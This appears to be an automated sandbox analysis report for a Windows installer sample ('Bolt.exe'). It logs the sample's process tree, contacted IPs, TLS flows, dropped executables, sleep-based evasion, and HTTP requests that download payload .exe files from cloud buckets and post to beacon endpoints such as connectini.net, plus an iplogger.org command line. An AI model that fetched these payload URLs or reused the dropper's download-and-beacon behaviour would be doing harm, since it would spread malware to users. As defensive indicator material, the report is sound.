Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Nov. 10, 2022, 9:46 a.m. | Nov. 10, 2022, 9:50 a.m. |
-
-
Bolt.tmp "C:\Users\test22\AppData\Local\Temp\is-93H7L.tmp\Bolt.tmp" /SL5="$80178,140559,56832,C:\Users\test22\AppData\Local\Temp\Bolt.exe"
2620-
-
SHaedahaepahy.exe "C:\Users\test22\AppData\Local\Temp\70-d6d8b-65e-9938c-d92ff496b918b\SHaedahaepahy.exe"
2116 -
Byqibuqyqa.exe "C:\Users\test22\AppData\Local\Temp\7c-440d3-728-fac9b-5a0261a9df152\Byqibuqyqa.exe"
1356-
iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
2996-
iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2996 CREDAT:145409
744
-
-
-
-
-
iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2764 CREDAT:145409
204
-
-
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1452
IP Address | Status | Action |
---|---|---|
185.213.208.196 | Active | Moloch |
142.250.76.132 | Active | Moloch |
142.250.76.142 | Active | Moloch |
148.251.234.83 | Active | Moloch |
151.115.10.1 | Active | Moloch |
164.124.101.2 | Active | Moloch |
173.233.137.36 | Active | Moloch |
23.216.159.9 | Active | Moloch |
23.43.165.105 | Active | Moloch |
23.43.165.66 | Active | Moloch |
37.230.138.123 | Active | Moloch |
37.230.138.66 | Active | Moloch |
52.219.170.66 | Active | Moloch |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49167 37.230.138.123:443 |
C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49 |
TLS 1.2 192.168.56.101:49170 151.115.10.1:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=s3.pl-waw.scw.cloud | 13:5a:26:76:9b:02:b0:88:8d:ed:ac:89:e9:f3:d1:bd:f4:6d:ff:fd |
TLS 1.2 192.168.56.101:49174 151.115.10.1:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=s3.pl-waw.scw.cloud | 13:5a:26:76:9b:02:b0:88:8d:ed:ac:89:e9:f3:d1:bd:f4:6d:ff:fd |
TLSv1 192.168.56.101:49215 173.233.137.36:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=profitabletrustednetwork.com | 6a:48:45:b5:44:ae:75:f4:d2:b3:d4:5e:bc:2f:61:30:ec:d4:3a:99 |
TLSv1 192.168.56.101:49199 37.230.138.123:443 |
C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49 |
TLSv1 192.168.56.101:49214 173.233.137.36:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=profitabletrustednetwork.com | 6a:48:45:b5:44:ae:75:f4:d2:b3:d4:5e:bc:2f:61:30:ec:d4:3a:99 |
TLS 1.2 192.168.56.101:49168 52.219.170.66:443 |
C=US, O=Amazon, OU=Server CA 1B, CN=Amazon | CN=*.s3.eu-central-1.amazonaws.com | bc:92:6b:62:48:5f:c5:08:60:03:a9:1e:bc:29:58:79:d7:4b:94:fb |
TLSv1 192.168.56.101:49193 37.230.138.123:443 |
C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49 |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
section | CODE |
section | DATA |
section | BSS |
suspicious_features | GET method with no useragent header | suspicious_request | GET http://nova-brothers.s3.pl-waw.scw.cloud/four-spoon/up-da-b135l0bjgejx.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://nova-brothers.s3.pl-waw.scw.cloud/four-spoon/pub-b135l0bjgejx.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://nova-brothers.s3.pl-waw.scw.cloud/four-spoon/hand-b135l0bjgejx.exe | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.google.com/ | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST https://connectini.net/Series/SuperNitouDisc.php | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://wewewe.s3.eu-central-1.amazonaws.com/WeUninstalled.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://doll.s3.pl-waw.scw.cloud/widgets/powerOff.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://connectini.net/S2S/Disc/Disc.php?ezok=power2off2&tesla=8 | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST https://connectini.net/Series/Conumer4Publisher.php | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://connectini.net/Series/publisher/1/KR.json | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST https://connectini.net/Series/Conumer2kenpachi.php | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://connectini.net/Series/kenpachi/2/goodchannel/KR.json | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://connectini.net/Series/configPoduct/2/goodchannel.json |
request | HEAD http://160dd0af-5534-4369-972f-5aa0f99c9324.s3.pl-waw.scw.cloud/workflow/poweroff-1mo67u5vspq3.exe |
request | GET http://160dd0af-5534-4369-972f-5aa0f99c9324.s3.pl-waw.scw.cloud/workflow/poweroff-1mo67u5vspq3.exe |
request | GET http://nova-brothers.s3.pl-waw.scw.cloud/four-spoon/up-da-b135l0bjgejx.exe |
request | GET http://nova-brothers.s3.pl-waw.scw.cloud/four-spoon/pub-b135l0bjgejx.exe |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
request | GET http://nova-brothers.s3.pl-waw.scw.cloud/four-spoon/hand-b135l0bjgejx.exe |
request | POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies |
request | GET http://www.google.com/ |
request | POST https://connectini.net/Series/SuperNitouDisc.php |
request | GET https://wewewe.s3.eu-central-1.amazonaws.com/WeUninstalled.exe |
request | GET https://doll.s3.pl-waw.scw.cloud/widgets/powerOff.exe |
request | GET https://connectini.net/S2S/Disc/Disc.php?ezok=power2off2&tesla=8 |
request | POST https://connectini.net/Series/Conumer4Publisher.php |
request | GET https://connectini.net/Series/publisher/1/KR.json |
request | POST https://connectini.net/Series/Conumer2kenpachi.php |
request | GET https://connectini.net/Series/kenpachi/2/goodchannel/KR.json |
request | GET https://connectini.net/Series/configPoduct/2/goodchannel.json |
request | POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies |
request | POST https://connectini.net/Series/SuperNitouDisc.php |
request | POST https://connectini.net/Series/Conumer4Publisher.php |
request | POST https://connectini.net/Series/Conumer2kenpachi.php |
description | Byqibuqyqa.exe tried to sleep 138 seconds, actually delayed analysis time by 138 seconds | |||
description | SHaedahaepahy.exe tried to sleep 133 seconds, actually delayed analysis time by 133 seconds |
file | C:\Users\test22\AppData\Local\Temp\is-2D1M1.tmp\idp.dll |
file | C:\Users\test22\AppData\Local\Temp\7c-440d3-728-fac9b-5a0261a9df152\Byqibuqyqa.exe |
file | C:\Users\test22\AppData\Local\Temp\is-2D1M1.tmp\_isetup\_shfoldr.dll |
file | C:\Users\test22\AppData\Local\Temp\is-2D1M1.tmp\PowerOff.exe |
file | C:\Program Files (x86)\Windows Sidebar\Kevideqoga.exe |
file | C:\Users\test22\AppData\Local\Temp\70-d6d8b-65e-9938c-d92ff496b918b\SHaedahaepahy.exe |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk |
cmdline | "C:\Windows\System32\cmd.exe" /c start https://iplogger.org/1RFfM4.psd |
file | C:\Users\test22\AppData\Local\Temp\70-d6d8b-65e-9938c-d92ff496b918b\SHaedahaepahy.exe |
file | C:\Users\test22\AppData\Local\Temp\7c-440d3-728-fac9b-5a0261a9df152\Byqibuqyqa.exe |
file | C:\Users\test22\AppData\Local\Temp\7c-440d3-728-fac9b-5a0261a9df152\Byqibuqyqa.exe |
file | C:\Users\test22\AppData\Local\Temp\70-d6d8b-65e-9938c-d92ff496b918b\SHaedahaepahy.exe |
file | C:\Users\test22\AppData\Local\Temp\is-2D1M1.tmp\_isetup\_shfoldr.dll |
file | C:\Users\test22\AppData\Local\Temp\is-2D1M1.tmp\idp.dll |
file | C:\Users\test22\AppData\Local\Temp\is-93H7L.tmp\Bolt.tmp |
file | C:\Users\test22\AppData\Local\Temp\is-2D1M1.tmp\PowerOff.exe |